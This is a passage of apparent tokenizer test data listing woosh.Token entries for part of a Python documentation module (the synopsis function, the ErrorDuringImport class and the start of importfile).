woosh.Token(woosh.NEWLINE, '\r\n', 339, 45, 340, 0),
woosh.Token(woosh.DEDENT, ' ', 340, 0, 340, 4),
woosh.Token(woosh.NAME, 'else', 340, 4, 340, 8),
woosh.Token(woosh.OP, ':', 340, 8, 340, 9),
woosh.Token(woosh.NAME, 'result', 340, 10, 340, 16),
woosh.Token(woosh.OP, '=', 340, 17, 340, 18),
woosh.Token(woosh.NAME, 'None', 340, 19, 340, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 340, 23, 341, 0),
woosh.Token(woosh.NAME, 'return', 341, 4, 341, 10),
woosh.Token(woosh.NAME, 'result', 341, 11, 341, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 341, 17, 342, 0),
woosh.Token(woosh.DEDENT, '', 343, 0, 343, 0),
woosh.Token(woosh.NAME, 'def', 343, 0, 343, 3),
woosh.Token(woosh.NAME, 'synopsis', 343, 4, 343, 12),
woosh.Token(woosh.OP, '(', 343, 12, 343, 13),
woosh.Token(woosh.NAME, 'filename', 343, 13, 343, 21),
woosh.Token(woosh.OP, ',', 343, 21, 343, 22),
woosh.Token(woosh.NAME, 'cache', 343, 23, 343, 28),
woosh.Token(woosh.OP, '=', 343, 28, 343, 29),
woosh.Token(woosh.OP, '{', 343, 29, 343, 30),
woosh.Token(woosh.OP, '}', 343, 30, 343, 31),
woosh.Token(woosh.OP, ')', 343, 31, 343, 32),
woosh.Token(woosh.OP, ':', 343, 32, 343, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 343, 33, 344, 0),
woosh.Token(woosh.INDENT, ' ', 344, 0, 344, 4),
woosh.Token(woosh.STRING, '"""Get the one-line summary out of a module file."""', 344, 4, 344, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 344, 56, 345, 0),
woosh.Token(woosh.NAME, 'mtime', 345, 4, 345, 9),
woosh.Token(woosh.OP, '=', 345, 10, 345, 11),
woosh.Token(woosh.NAME, 'os', 345, 12, 345, 14),
woosh.Token(woosh.OP, '.', 345, 14, 345, 15),
woosh.Token(woosh.NAME, 'stat', 345, 15, 345, 19),
woosh.Token(woosh.OP, '(', 345, 19, 345, 20),
woosh.Token(woosh.NAME, 'filename', 345, 20, 345, 28),
woosh.Token(woosh.OP, ')', 345, 28, 345, 29),
woosh.Token(woosh.OP, '.', 345, 29, 345, 30),
woosh.Token(woosh.NAME, 'st_mtime', 345, 30, 345, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 345, 38, 346, 0),
woosh.Token(woosh.NAME, 'lastupdate', 346, 4, 346, 14),
woosh.Token(woosh.OP, ',', 346, 14, 346, 15),
woosh.Token(woosh.NAME, 'result', 346, 16, 346, 22),
woosh.Token(woosh.OP, '=', 346, 23, 346, 24),
woosh.Token(woosh.NAME, 'cache', 346, 25, 346, 30),
woosh.Token(woosh.OP, '.', 346, 30, 346, 31),
woosh.Token(woosh.NAME, 'get', 346, 31, 346, 34),
woosh.Token(woosh.OP, '(', 346, 34, 346, 35),
woosh.Token(woosh.NAME, 'filename', 346, 35, 346, 43),
woosh.Token(woosh.OP, ',', 346, 43, 346, 44),
woosh.Token(woosh.OP, '(', 346, 45, 346, 46),
woosh.Token(woosh.NAME, 'None', 346, 46, 346, 50),
woosh.Token(woosh.OP, ',', 346, 50, 346, 51),
woosh.Token(woosh.NAME, 'None', 346, 52, 346, 56),
woosh.Token(woosh.OP, ')', 346, 56, 346, 57),
woosh.Token(woosh.OP, ')', 346, 57, 346, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 346, 58, 347, 0),
woosh.Token(woosh.NAME, 'if', 347, 4, 347, 6),
woosh.Token(woosh.NAME, 'lastupdate', 347, 7, 347, 17),
woosh.Token(woosh.NAME, 'is', 347, 18, 347, 20),
woosh.Token(woosh.NAME, 'None', 347, 21, 347, 25),
woosh.Token(woosh.NAME, 'or', 347, 26, 347, 28),
woosh.Token(woosh.NAME, 'lastupdate', 347, 29, 347, 39),
woosh.Token(woosh.OP, '<', 347, 40, 347, 41),
woosh.Token(woosh.NAME, 'mtime', 347, 42, 347, 47),
woosh.Token(woosh.OP, ':', 347, 47, 347, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 347, 48, 348, 0),
woosh.Token(woosh.COMMENT, '# Look for binary suffixes first, falling back to source.', 348, 8, 348, 65),
woosh.Token(woosh.INDENT, ' ', 349, 0, 349, 8),
woosh.Token(woosh.NAME, 'if', 349, 8, 349, 10),
woosh.Token(woosh.NAME, 'filename', 349, 11, 349, 19),
woosh.Token(woosh.OP, '.', 349, 19, 349, 20),
woosh.Token(woosh.NAME, 'endswith', 349, 20, 349, 28),
woosh.Token(woosh.OP, '(', 349, 28, 349, 29),
woosh.Token(woosh.NAME, 'tuple', 349, 29, 349, 34),
woosh.Token(woosh.OP, '(', 349, 34, 349, 35),
woosh.Token(woosh.NAME, 'importlib', 349, 35, 349, 44),
woosh.Token(woosh.OP, '.', 349, 44, 349, 45),
woosh.Token(woosh.NAME, 'machinery', 349, 45, 349, 54),
woosh.Token(woosh.OP, '.', 349, 54, 349, 55),
woosh.Token(woosh.NAME, 'BYTECODE_SUFFIXES', 349, 55, 349, 72),
woosh.Token(woosh.OP, ')', 349, 72, 349, 73),
woosh.Token(woosh.OP, ')', 349, 73, 349, 74),
woosh.Token(woosh.OP, ':', 349, 74, 349, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 349, 75, 350, 0),
woosh.Token(woosh.INDENT, ' ', 350, 0, 350, 12),
woosh.Token(woosh.NAME, 'loader_cls', 350, 12, 350, 22),
woosh.Token(woosh.OP, '=', 350, 23, 350, 24),
woosh.Token(woosh.NAME, 'importlib', 350, 25, 350, 34),
woosh.Token(woosh.OP, '.', 350, 34, 350, 35),
woosh.Token(woosh.NAME, 'machinery', 350, 35, 350, 44),
woosh.Token(woosh.OP, '.', 350, 44, 350, 45),
woosh.Token(woosh.NAME, 'SourcelessFileLoader', 350, 45, 350, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 350, 65, 351, 0),
woosh.Token(woosh.DEDENT, ' ', 351, 0, 351, 8),
woosh.Token(woosh.NAME, 'elif', 351, 8, 351, 12),
woosh.Token(woosh.NAME, 'filename', 351, 13, 351, 21),
woosh.Token(woosh.OP, '.', 351, 21, 351, 22),
woosh.Token(woosh.NAME, 'endswith', 351, 22, 351, 30),
woosh.Token(woosh.OP, '(', 351, 30, 351, 31),
woosh.Token(woosh.NAME, 'tuple', 351, 31, 351, 36),
woosh.Token(woosh.OP, '(', 351, 36, 351, 37),
woosh.Token(woosh.NAME, 'importlib', 351, 37, 351, 46),
woosh.Token(woosh.OP, '.', 351, 46, 351, 47),
woosh.Token(woosh.NAME, 'machinery', 351, 47, 351, 56),
woosh.Token(woosh.OP, '.', 351, 56, 351, 57),
woosh.Token(woosh.NAME, 'EXTENSION_SUFFIXES', 351, 57, 351, 75),
woosh.Token(woosh.OP, ')', 351, 75, 351, 76),
woosh.Token(woosh.OP, ')', 351, 76, 351, 77),
woosh.Token(woosh.OP, ':', 351, 77, 351, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 351, 78, 352, 0),
woosh.Token(woosh.INDENT, ' ', 352, 0, 352, 12),
woosh.Token(woosh.NAME, 'loader_cls', 352, 12, 352, 22),
woosh.Token(woosh.OP, '=', 352, 23, 352, 24),
woosh.Token(woosh.NAME, 'importlib', 352, 25, 352, 34),
woosh.Token(woosh.OP, '.', 352, 34, 352, 35),
woosh.Token(woosh.NAME, 'machinery', 352, 35, 352, 44),
woosh.Token(woosh.OP, '.', 352, 44, 352, 45),
woosh.Token(woosh.NAME, 'ExtensionFileLoader', 352, 45, 352, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 352, 64, 353, 0),
woosh.Token(woosh.DEDENT, ' ', 353, 0, 353, 8),
woosh.Token(woosh.NAME, 'else', 353, 8, 353, 12),
woosh.Token(woosh.OP, ':', 353, 12, 353, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 353, 13, 354, 0),
woosh.Token(woosh.INDENT, ' ', 354, 0, 354, 12),
woosh.Token(woosh.NAME, 'loader_cls', 354, 12, 354, 22),
woosh.Token(woosh.OP, '=', 354, 23, 354, 24),
woosh.Token(woosh.NAME, 'None', 354, 25, 354, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 354, 29, 355, 0),
woosh.Token(woosh.COMMENT, '# Now handle the choice.', 355, 8, 355, 32),
woosh.Token(woosh.DEDENT, ' ', 356, 0, 356, 8),
woosh.Token(woosh.NAME, 'if', 356, 8, 356, 10),
woosh.Token(woosh.NAME, 'loader_cls', 356, 11, 356, 21),
woosh.Token(woosh.NAME, 'is', 356, 22, 356, 24),
woosh.Token(woosh.NAME, 'None', 356, 25, 356, 29),
woosh.Token(woosh.OP, ':', 356, 29, 356, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 356, 30, 357, 0),
woosh.Token(woosh.COMMENT, '# Must be a source file.', 357, 12, 357, 36),
woosh.Token(woosh.INDENT, ' ', 358, 0, 358, 12),
woosh.Token(woosh.NAME, 'try', 358, 12, 358, 15),
woosh.Token(woosh.OP, ':', 358, 15, 358, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 358, 16, 359, 0),
woosh.Token(woosh.INDENT, ' ', 359, 0, 359, 16),
woosh.Token(woosh.NAME, 'file', 359, 16, 359, 20),
woosh.Token(woosh.OP, '=', 359, 21, 359, 22),
woosh.Token(woosh.NAME, 'tokenize', 359, 23, 359, 31),
woosh.Token(woosh.OP, '.', 359, 31, 359, 32),
woosh.Token(woosh.NAME, 'open', 359, 32, 359, 36),
woosh.Token(woosh.OP, '(', 359, 36, 359, 37),
woosh.Token(woosh.NAME, 'filename', 359, 37, 359, 45),
woosh.Token(woosh.OP, ')', 359, 45, 359, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 359, 46, 360, 0),
woosh.Token(woosh.DEDENT, ' ', 360, 0, 360, 12),
woosh.Token(woosh.NAME, 'except', 360, 12, 360, 18),
woosh.Token(woosh.NAME, 'OSError', 360, 19, 360, 26),
woosh.Token(woosh.OP, ':', 360, 26, 360, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 360, 27, 361, 0),
woosh.Token(woosh.COMMENT, "# module can't be opened, so skip it", 361, 16, 361, 52),
woosh.Token(woosh.INDENT, ' ', 362, 0, 362, 16),
woosh.Token(woosh.NAME, 'return', 362, 16, 362, 22),
woosh.Token(woosh.NAME, 'None', 362, 23, 362, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 362, 27, 363, 0),
woosh.Token(woosh.COMMENT, '# text modules can be directly examined', 363, 12, 363, 51),
woosh.Token(woosh.DEDENT, ' ', 364, 0, 364, 12),
woosh.Token(woosh.NAME, 'with', 364, 12, 364, 16),
woosh.Token(woosh.NAME, 'file', 364, 17, 364, 21),
woosh.Token(woosh.OP, ':', 364, 21, 364, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 364, 22, 365, 0),
woosh.Token(woosh.INDENT, ' ', 365, 0, 365, 16),
woosh.Token(woosh.NAME, 'result', 365, 16, 365, 22),
woosh.Token(woosh.OP, '=', 365, 23, 365, 24),
woosh.Token(woosh.NAME, 'source_synopsis', 365, 25, 365, 40),
woosh.Token(woosh.OP, '(', 365, 40, 365, 41),
woosh.Token(woosh.NAME, 'file', 365, 41, 365, 45),
woosh.Token(woosh.OP, ')', 365, 45, 365, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 365, 46, 366, 0),
woosh.Token(woosh.DEDENT, ' ', 366, 0, 366, 8),
woosh.Token(woosh.DEDENT, '', 366, 8, 366, 8),
woosh.Token(woosh.NAME, 'else', 366, 8, 366, 12),
woosh.Token(woosh.OP, ':', 366, 12, 366, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 366, 13, 367, 0),
woosh.Token(woosh.COMMENT, '# Must be a binary module, which has to be imported.', 367, 12, 367, 64),
woosh.Token(woosh.INDENT, ' ', 368, 0, 368, 12),
woosh.Token(woosh.NAME, 'loader', 368, 12, 368, 18),
woosh.Token(woosh.OP, '=', 368, 19, 368, 20),
woosh.Token(woosh.NAME, 'loader_cls', 368, 21, 368, 31),
woosh.Token(woosh.OP, '(', 368, 31, 368, 32),
woosh.Token(woosh.STRING, "'__temp__'", 368, 32, 368, 42),
woosh.Token(woosh.OP, ',', 368, 42, 368, 43),
woosh.Token(woosh.NAME, 'filename', 368, 44, 368, 52),
woosh.Token(woosh.OP, ')', 368, 52, 368, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 368, 53, 369, 0),
woosh.Token(woosh.COMMENT, "# XXX We probably don't need to pass in the loader here.", 369, 12, 369, 68),
woosh.Token(woosh.NAME, 'spec', 370, 12, 370, 16),
woosh.Token(woosh.OP, '=', 370, 17, 370, 18),
woosh.Token(woosh.NAME, 'importlib', 370, 19, 370, 28),
woosh.Token(woosh.OP, '.', 370, 28, 370, 29),
woosh.Token(woosh.NAME, 'util', 370, 29, 370, 33),
woosh.Token(woosh.OP, '.', 370, 33, 370, 34),
woosh.Token(woosh.NAME, 'spec_from_file_location', 370, 34, 370, 57),
woosh.Token(woosh.OP, '(', 370, 57, 370, 58),
woosh.Token(woosh.STRING, "'__temp__'", 370, 58, 370, 68),
woosh.Token(woosh.OP, ',', 370, 68, 370, 69),
woosh.Token(woosh.NAME, 'filename', 370, 70, 370, 78),
woosh.Token(woosh.OP, ',', 370, 78, 370, 79),
woosh.Token(woosh.NAME, 'loader', 371, 58, 371, 64),
woosh.Token(woosh.OP, '=', 371, 64, 371, 65),
woosh.Token(woosh.NAME, 'loader', 371, 65, 371, 71),
woosh.Token(woosh.OP, ')', 371, 71, 371, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 371, 72, 372, 0),
woosh.Token(woosh.NAME, 'try', 372, 12, 372, 15),
woosh.Token(woosh.OP, ':', 372, 15, 372, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 372, 16, 373, 0),
woosh.Token(woosh.INDENT, ' ', 373, 0, 373, 16),
woosh.Token(woosh.NAME, 'module', 373, 16, 373, 22),
woosh.Token(woosh.OP, '=', 373, 23, 373, 24),
woosh.Token(woosh.NAME, 'importlib', 373, 25, 373, 34),
woosh.Token(woosh.OP, '.', 373, 34, 373, 35),
woosh.Token(woosh.NAME, '_bootstrap', 373, 35, 373, 45),
woosh.Token(woosh.OP, '.', 373, 45, 373, 46),
woosh.Token(woosh.NAME, '_load', 373, 46, 373, 51),
woosh.Token(woosh.OP, '(', 373, 51, 373, 52),
woosh.Token(woosh.NAME, 'spec', 373, 52, 373, 56),
woosh.Token(woosh.OP, ')', 373, 56, 373, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 373, 57, 374, 0),
woosh.Token(woosh.DEDENT, ' ', 374, 0, 374, 12),
woosh.Token(woosh.NAME, 'except', 374, 12, 374, 18),
woosh.Token(woosh.OP, ':', 374, 18, 374, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 374, 19, 375, 0),
woosh.Token(woosh.INDENT, ' ', 375, 0, 375, 16),
woosh.Token(woosh.NAME, 'return', 375, 16, 375, 22),
woosh.Token(woosh.NAME, 'None', 375, 23, 375, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 375, 27, 376, 0),
woosh.Token(woosh.DEDENT, ' ', 376, 0, 376, 12),
woosh.Token(woosh.NAME, 'del', 376, 12, 376, 15),
woosh.Token(woosh.NAME, 'sys', 376, 16, 376, 19),
woosh.Token(woosh.OP, '.', 376, 19, 376, 20),
woosh.Token(woosh.NAME, 'modules', 376, 20, 376, 27),
woosh.Token(woosh.OP, '[', 376, 27, 376, 28),
woosh.Token(woosh.STRING, "'__temp__'", 376, 28, 376, 38),
woosh.Token(woosh.OP, ']', 376, 38, 376, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 376, 39, 377, 0),
woosh.Token(woosh.NAME, 'result', 377, 12, 377, 18),
woosh.Token(woosh.OP, '=', 377, 19, 377, 20),
woosh.Token(woosh.NAME, 'module', 377, 21, 377, 27),
woosh.Token(woosh.OP, '.', 377, 27, 377, 28),
woosh.Token(woosh.NAME, '__doc__', 377, 28, 377, 35),
woosh.Token(woosh.OP, '.', 377, 35, 377, 36),
woosh.Token(woosh.NAME, 'splitlines', 377, 36, 377, 46),
woosh.Token(woosh.OP, '(', 377, 46, 377, 47),
woosh.Token(woosh.OP, ')', 377, 47, 377, 48),
woosh.Token(woosh.OP, '[', 377, 48, 377, 49),
woosh.Token(woosh.NUMBER, '0', 377, 49, 377, 50),
woosh.Token(woosh.OP, ']', 377, 50, 377, 51),
woosh.Token(woosh.NAME, 'if', 377, 52, 377, 54),
woosh.Token(woosh.NAME, 'module', 377, 55, 377, 61),
woosh.Token(woosh.OP, '.', 377, 61, 377, 62),
woosh.Token(woosh.NAME, '__doc__', 377, 62, 377, 69),
woosh.Token(woosh.NAME, 'else', 377, 70, 377, 74),
woosh.Token(woosh.NAME, 'None', 377, 75, 377, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 377, 79, 378, 0),
woosh.Token(woosh.COMMENT, '# Cache the result.', 378, 8, 378, 27),
woosh.Token(woosh.DEDENT, ' ', 379, 0, 379, 8),
woosh.Token(woosh.NAME, 'cache', 379, 8, 379, 13),
woosh.Token(woosh.OP, '[', 379, 13, 379, 14),
woosh.Token(woosh.NAME, 'filename', 379, 14, 379, 22),
woosh.Token(woosh.OP, ']', 379, 22, 379, 23),
woosh.Token(woosh.OP, '=', 379, 24, 379, 25),
woosh.Token(woosh.OP, '(', 379, 26, 379, 27),
woosh.Token(woosh.NAME, 'mtime', 379, 27, 379, 32),
woosh.Token(woosh.OP, ',', 379, 32, 379, 33),
woosh.Token(woosh.NAME, 'result', 379, 34, 379, 40),
woosh.Token(woosh.OP, ')', 379, 40, 379, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 379, 41, 380, 0),
woosh.Token(woosh.DEDENT, ' ', 380, 0, 380, 4),
woosh.Token(woosh.NAME, 'return', 380, 4, 380, 10),
woosh.Token(woosh.NAME, 'result', 380, 11, 380, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 380, 17, 381, 0),
woosh.Token(woosh.DEDENT, '', 382, 0, 382, 0),
woosh.Token(woosh.NAME, 'class', 382, 0, 382, 5),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 382, 6, 382, 23),
woosh.Token(woosh.OP, '(', 382, 23, 382, 24),
woosh.Token(woosh.NAME, 'Exception', 382, 24, 382, 33),
woosh.Token(woosh.OP, ')', 382, 33, 382, 34),
woosh.Token(woosh.OP, ':', 382, 34, 382, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 382, 35, 383, 0),
woosh.Token(woosh.INDENT, ' ', 383, 0, 383, 4),
woosh.Token(woosh.STRING, '"""Errors that occurred while trying to import something to document it."""', 383, 4, 383, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 383, 79, 384, 0),
woosh.Token(woosh.NAME, 'def', 384, 4, 384, 7),
woosh.Token(woosh.NAME, '__init__', 384, 8, 384, 16),
woosh.Token(woosh.OP, '(', 384, 16, 384, 17),
woosh.Token(woosh.NAME, 'self', 384, 17, 384, 21),
woosh.Token(woosh.OP, ',', 384, 21, 384, 22),
woosh.Token(woosh.NAME, 'filename', 384, 23, 384, 31),
woosh.Token(woosh.OP, ',', 384, 31, 384, 32),
woosh.Token(woosh.NAME, 'exc_info', 384, 33, 384, 41),
woosh.Token(woosh.OP, ')', 384, 41, 384, 42),
woosh.Token(woosh.OP, ':', 384, 42, 384, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 384, 43, 385, 0),
woosh.Token(woosh.INDENT, ' ', 385, 0, 385, 8),
woosh.Token(woosh.NAME, 'self', 385, 8, 385, 12),
woosh.Token(woosh.OP, '.', 385, 12, 385, 13),
woosh.Token(woosh.NAME, 'filename', 385, 13, 385, 21),
woosh.Token(woosh.OP, '=', 385, 22, 385, 23),
woosh.Token(woosh.NAME, 'filename', 385, 24, 385, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 385, 32, 386, 0),
woosh.Token(woosh.NAME, 'self', 386, 8, 386, 12),
woosh.Token(woosh.OP, '.', 386, 12, 386, 13),
woosh.Token(woosh.NAME, 'exc', 386, 13, 386, 16),
woosh.Token(woosh.OP, ',', 386, 16, 386, 17),
woosh.Token(woosh.NAME, 'self', 386, 18, 386, 22),
woosh.Token(woosh.OP, '.', 386, 22, 386, 23),
woosh.Token(woosh.NAME, 'value', 386, 23, 386, 28),
woosh.Token(woosh.OP, ',', 386, 28, 386, 29),
woosh.Token(woosh.NAME, 'self', 386, 30, 386, 34),
woosh.Token(woosh.OP, '.', 386, 34, 386, 35),
woosh.Token(woosh.NAME, 'tb', 386, 35, 386, 37),
woosh.Token(woosh.OP, '=', 386, 38, 386, 39),
woosh.Token(woosh.NAME, 'exc_info', 386, 40, 386, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 386, 48, 387, 0),
woosh.Token(woosh.DEDENT, ' ', 388, 0, 388, 4),
woosh.Token(woosh.NAME, 'def', 388, 4, 388, 7),
woosh.Token(woosh.NAME, '__str__', 388, 8, 388, 15),
woosh.Token(woosh.OP, '(', 388, 15, 388, 16),
woosh.Token(woosh.NAME, 'self', 388, 16, 388, 20),
woosh.Token(woosh.OP, ')', 388, 20, 388, 21),
woosh.Token(woosh.OP, ':', 388, 21, 388, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 388, 22, 389, 0),
woosh.Token(woosh.INDENT, ' ', 389, 0, 389, 8),
woosh.Token(woosh.NAME, 'exc', 389, 8, 389, 11),
woosh.Token(woosh.OP, '=', 389, 12, 389, 13),
woosh.Token(woosh.NAME, 'self', 389, 14, 389, 18),
woosh.Token(woosh.OP, '.', 389, 18, 389, 19),
woosh.Token(woosh.NAME, 'exc', 389, 19, 389, 22),
woosh.Token(woosh.OP, '.', 389, 22, 389, 23),
woosh.Token(woosh.NAME, '__name__', 389, 23, 389, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 389, 31, 390, 0),
woosh.Token(woosh.NAME, 'return', 390, 8, 390, 14),
woosh.Token(woosh.STRING, "'problem in %s - %s: %s'", 390, 15, 390, 39),
woosh.Token(woosh.OP, '%', 390, 40, 390, 41),
woosh.Token(woosh.OP, '(', 390, 42, 390, 43),
woosh.Token(woosh.NAME, 'self', 390, 43, 390, 47),
woosh.Token(woosh.OP, '.', 390, 47, 390, 48),
woosh.Token(woosh.NAME, 'filename', 390, 48, 390, 56),
woosh.Token(woosh.OP, ',', 390, 56, 390, 57),
woosh.Token(woosh.NAME, 'exc', 390, 58, 390, 61),
woosh.Token(woosh.OP, ',', 390, 61, 390, 62),
woosh.Token(woosh.NAME, 'self', 390, 63, 390, 67),
woosh.Token(woosh.OP, '.', 390, 67, 390, 68),
woosh.Token(woosh.NAME, 'value', 390, 68, 390, 73),
woosh.Token(woosh.OP, ')', 390, 73, 390, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 390, 74, 391, 0),
woosh.Token(woosh.DEDENT, '', 392, 0, 392, 0),
woosh.Token(woosh.DEDENT, '', 392, 0, 392, 0),
woosh.Token(woosh.NAME, 'def', 392, 0, 392, 3),
woosh.Token(woosh.NAME, 'importfile', 392, 4, 392, 14),
woosh.Token(woosh.OP, '(', 392, 14, 392, 15),
woosh.Token(woosh.NAME, 'path', 392, 15, 392, 19),
woosh.Token(woosh.OP, ')', 392, 19, 392, 20),
woosh.Token(woosh.OP, ':', 392, 20, 392, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 392, 21, 393, 0),
woosh.Token(woosh.INDENT, ' ', 393, 0, 393, 4),
woosh.Token(woosh.STRING, '"""Import a Python source file or compiled file given its path."""', 393, 4, 393, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 393, 70, 394, 0),
woosh.Token(woosh.NAME, 'magic', 394, 4, 394, 9),
woosh.Token(woosh.OP, '=', 394, 10, 394, 11),
woosh.Token(woosh.NAME, 'importlib', 394, 12, 394, 21),
woosh.Token(woosh.OP, '.', 394, 21, 394, 22),
woosh.Token(woosh.NAME, 'util', 394, 22, 394, 26),
woosh.Token(woosh.OP, '.', 394, 26, 394, 27),
woosh.Token(woosh.NAME, 'MAGIC_NUMBER', 394, 27, 394, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 394, 39, 395, 0),
woosh.Token(woosh.NAME, 'with', 395, 4, 395, 8),
woosh.Token(woosh.NAME, 'open', 395, 9, 395, 13),
woosh.Token(woosh.OP, '(', 395, 13, 395, 14),
woosh.Token(woosh.NAME, 'path', 395, 14, 395, 18),
woosh.Token(woosh.OP, ',', 395, 18, 395, 19),
woosh.Token(woosh.STRING, "'rb'", 395, 20, 395, 24),
woosh.Token(woosh.OP, ')', 395, 24, 395, 25),
woosh.Token(woosh.NAME, 'as', 395, 26, 395, 28),
woosh.Token(woosh.NAME, 'file', 395, 29, 395, 33),
woosh.Token(woosh.OP, ':', 395, 33, 395, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 395, 34, 396, 0),
woosh.Token(woosh.INDENT, ' ', 396, 0, 396, 8),
woosh.Token(woosh.NAME, 'is_bytecode', 396, 8, 396, 19),
woosh.Token(woosh.OP, '=', 396, 20, 396, 21),
woosh.Token(woosh.NAME, 'magic', 396, 22, 396, 27),
woosh.Token(woosh.OP, '==', 396, 28, 396, 30),
woosh.Token(woosh.NAME, 'file', 396, 31, 396, 35),
woosh.Token(woosh.OP, '.', 396, 35, 396, 36),
woosh.Token(woosh.NAME, 'read', 396, 36, 396, 40),
woosh.Token(woosh.OP, '(', 396, 40, 396, 41),
woosh.Token(woosh.NAME, 'len', 396, 41, 396, 44),
woosh.Token(woosh.OP, '(', 396, 44, 396, 45),
woosh.Token(woosh.NAME, 'magic', 396, 45, 396, 50),
woosh.Token(woosh.OP, ')', 396, 50, 396, 51),
woosh.Token(woosh.OP, ')', 396, 51, 396, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 396, 52, 397, 0),
woosh.Token(woosh.DEDENT, ' ', 397, 0, 397, 4),
woosh.Token(woosh.NAME, 'filename', 397, 4, 397, 12),
woosh.Token(woosh.OP, '=', 397, 13, 397, 14),
woosh.Token(woosh.NAME, 'os', 397, 15, 397, 17),
woosh.Token(woosh.OP, '.', 397, 17, 397, 18),
woosh.Token(woosh.NAME, 'path', 397, 18, 397, 22),
woosh.Token(woosh.OP, '.', 397, 22, 397, 23),
woosh.Token(woosh.NAME, 'basename', 397, 23, 397, 31),
woosh.Token(woosh.OP, '(', 397, 31, 397, 32),
woosh.Token(woosh.NAME, 'path', 397, 32, 397, 36),
woosh.Token(woosh.OP, ')', 397, 36, 397, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 397, 37, 398, 0),
woosh.Token(woosh.NAME, 'name', 398, 4, 398, 8),
woosh.Token(woosh.OP, ',', 398, 8, 398, 9),
woosh.Token(woosh.NAME, 'ext', 398, 10, 398, 13),
woosh.Token(woosh.OP, '=', 398, 14, 398, 15),
woosh.Token(woosh.NAME, 'os', 398, 16, 398, 18),
woosh.Token(woosh.OP, '.', 398, 18, 398, 19),
woosh.Token(woosh.NAME, 'path', 398, 19, 398, 23),
woosh.Token(woosh.OP, '.', 398, 23, 398, 24),
woosh.Token(woosh.NAME, 'splitext', 398, 24, 398, 32),
woosh.Token(woosh.OP, '(', 398, 32, 398, 33),
woosh.Token(woosh.NAME, 'filename', 398, 33, 398, 41),
woosh.Token(woosh.OP, ')', 398, 41, 398, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 398, 42, 399, 0),
woosh.Token(woosh.NAME, 'if', 399, 4, 399, 6),
woosh.Token(woosh.NAME, 'is_bytecode', 399, 7, 399, 18),
woosh.Token(woosh.OP, ':', 399, 18, 399, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 399, 19, 400, 0),
woosh.Token(woosh.INDENT, ' ', 400, 0, 400, 8),
woosh.Token(woosh.NAME, 'loader', 400, 8, 400, 14),
woosh.Token(woosh.OP, '=', 400, 15, 400, 16),
woosh.Token(woosh.NAME, 'importlib', 400, 17, 400, 26),
woosh.Token(woosh.OP, '.', 400, 26, 400, 27),
woosh.Token(woosh.NAME, '_bootstrap_external', 400, 27, 400, 46),
woosh.Token(woosh.OP, '.', 400, 46, 400, 47),
woosh.Token(woosh.NAME, 'SourcelessFileLoader', 400, 47, 400, 67),
woosh.Token(woosh.OP, '(', 400, 67, 400, 68),
woosh.Token(woosh.NAME, 'name', 400, 68, 400, 72),
woosh.Token(woosh.OP, ',', 400, 72, 400, 73),
woosh.Token(woosh.NAME, 'path', 400, 74, 400, 78),
woosh.Token(woosh.OP, ')', 400, 78, 400, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 400, 79, 401, 0),
woosh.Token(woosh.DEDENT, ' ', 401, 0, 401, 4),
woosh.Token(woosh.NAME, 'else', 401, 4, 401, 8),
woosh.Token(woosh.OP, ':', 401, 8, 401, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 401, 9, 402, 0),
woosh.Token(woosh.INDENT, ' ', 402, 0, 402, 8),
woosh.Token(woosh.NAME, 'loader', 402, 8, 402, 14),
woosh.Token(woosh.OP, '=', 402, 15, 402, 16),
woosh.Token(woosh.NAME, 'importlib', 402, 17, 402, 26),
woosh.Token(woosh.OP, '.', 402, 26, 402, 27),
woosh.Token(woosh.NAME, '_bootstrap_external', 402, 27, 402, 46),
woosh.Token(woosh.OP, '.', 402, 46, 402, 47),
woosh.Token(woosh.NAME, 'SourceFileLoader', 402, 47, 402, 63),
woosh.Token(woosh.OP, '(', 402, 63, 402, 64),
woosh.Token(woosh.NAME, 'name', 402, 64, 402, 68),
woosh.Token(woosh.OP, ',', 402, 68, 402, 69),
woosh.Token(woosh.NAME, 'path', 402, 70, 402, 74),
